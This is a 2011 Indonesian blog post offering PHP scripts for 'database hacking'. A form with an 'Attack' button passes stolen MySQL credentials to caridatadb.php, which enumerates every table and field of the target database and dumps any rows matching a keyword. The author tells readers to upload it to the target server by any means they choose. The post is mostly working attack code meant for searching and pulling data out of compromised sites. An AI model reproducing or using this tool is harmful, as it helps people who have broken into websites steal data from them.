Searching...
Jumat, 25 Februari 2011

SEARCHING ISI DATABASE MYSQL VIA PHP SCRIPT


Setelah saya menulis artikel pertama, "exploit database via php script" ... saya menemukan kesulitan untuk mencari isi database dari situs target yang memiliki struktur database yang banyak dan komplek. Dengan struktur database komplek maka penelusuran isi database akan sangat melelahkan dan membosankan .... ditambah tentu saja pemborosan biaya internet, untuk memudahkan masalah tersebut maka saya mencoba untuk membuat script yang berfungsi untuk menelusuri seluruh isi database target hanya dengan memasukkan kata kunci pencarian, maka script akan berjalan secara otomatis. 
Jadi saya akan mereview sedikit script pertama "exploit database via php script" tambahkan script ini pada file config1.php
echo "<font color=\"#FFFF00\" size=\"3\">Cari data pada basisdata
$db</font>";
echo "
<form name=\"form1\" method=\"post\" action=\"caridatadb.php\">
<table width=\"325\" border=\"1\" cellspacing=\"1\" cellpadding=\"0\"
bordercolor=\"#0000FF\">
<tr bgcolor=\"#000000\">
<td width=\"150\"><font color=\"#FFFF00\" size=\"2\">Cari Data</td>
<td width=\"4\">:</td>
<td width=\"170\"><input name=\"data\" type=\"text\" id=\"data\">
<input type=\"hidden\" name=\"db\" value=\"$db\">
<input type=\"hidden\" name=\"server\" value=\"$server\">
<input type=\"hidden\" name=\"user\" value=\"$user\">
<input type=\"hidden\" name=\"password\" value=\"$password\"></td>
</tr>
<tr bgcolor=\"#000000\">
<td></td>
<td></td>
<td><input name=\"submit\" type=\"submit\" id=\"submit\"
value=\"Attack\"></td>
</tr>
</table>
</form> ";
OK...fungsi dari script ini untuk input data server, nama database, nama user, password database, dan kata kunci pencarian data, sepertinya tidak perlu dijelaskan lagi cara mencari konfigurasi database tersebut.
selanjutnya script kedua berfungsi untuk memproses input tersebut dan akan menelusuri isi database,dan menampilkan isi database yang kita cari, sekaligus akan terlihat struktur dari database tersebut....
caridatadb.php

<?php
/******************************************************/
/* DataBase Hacking: Hacking dengan menggunakan DB untuk situs CMS
*/
/* ==================================================*/
/*
*/
/* Modul Pencarian Isi DataBase */
/* Copyright (c) 2006 by anstellwinkel (anstellwinkel@yahoo.com.au)
*/
/* or koyakaguya@yahoo.com
*/
/*
*/
/* Program ini adalah free software. Anda dapat mendistribusikannya dan
*/
/* memodifikasinya sesuai keinginan anda dengan tetap menyertakan */
/* nama author
*/
/**********************************************************************
**/
echo "<center>Hacking Database<br>Modul Pencarian Isi
Database<br><br>";
echo "<center>by anstellwinkel at anstellwinkel@yahoo.com.au";
mysql_connect($server,"$user", "$password");
$hasil=mysql_db_query($db, "show tables from $db");
$isi=count($hasil);
while($isi1=mysql_fetch_row($hasil))
{
for($jml=0;$jml<$isi;$jml++)
{
echo "<table width=\"700\" border=\"1\" cellspacing=\"1\"
cellpadding=\"0\" bordercolor=\"#0000FF\">";
echo "<br><tr bgcolor=\"#000000\"><td><font color=\"#EB8038\"
size=\"3\">
<center>Tabel $isi1[$jml]<center><br></td></tr></table>";
$parameter=mysql_db_query($db, "show fields from $isi1[$jml]");
$isi5=count($parameter);
while($isi3=mysql_fetch_row($parameter))
{
for($jml1=0;$jml1<$isi5;$jml1++)
{
echo "<table width=\"700\" border=\"1\" cellspacing=\"1\"
cellpadding=\"0\" bordercolor=\"#0000FF\">";
echo "<tr bgcolor=\"#000000\"><td><font color=\"#FFFF00\"
size=\"2\">$isi3[$jml1]<br></td></tr></table>";
$pencarian=mysql_db_query($db, "select $isi3[$jml1] from $isi1[$jml]
where $isi3[$jml1] like '%$data%'");
$isi8=count($pencarian);
while($hasilcari=mysql_fetch_row($pencarian))
{
for($jml2=0;$jml2<$isi8;$jml2++)
{
$result=$hasilcari[$jml2];
echo "<table width=\"700\" border=\"1\" cellspacing=\"1\"
cellpadding=\"0\" bordercolor=\"#0000FF\">";
echo "<tr bgcolor=\"#000000\"><td><font color=\"#00FF00\"
size=\"2\">$result<br></td></tr></table>"; }}
}
}
}
}
?>
dan sekali lagi sebagai catatan script ini harus diupload keserver target....caranya terserah anda!!!!

1 comments:

Posting Komentar

Like & Share :


Mari budayakan berkomentar baik berupa Kritik, Saran, maupun Pertanyaan untuk menjadikan blog ini lebih baik ke depannya. Copy-Paste di ijinkan, tapi URL sumbernya disertakan.
Terima Kasih.

 
Back to top!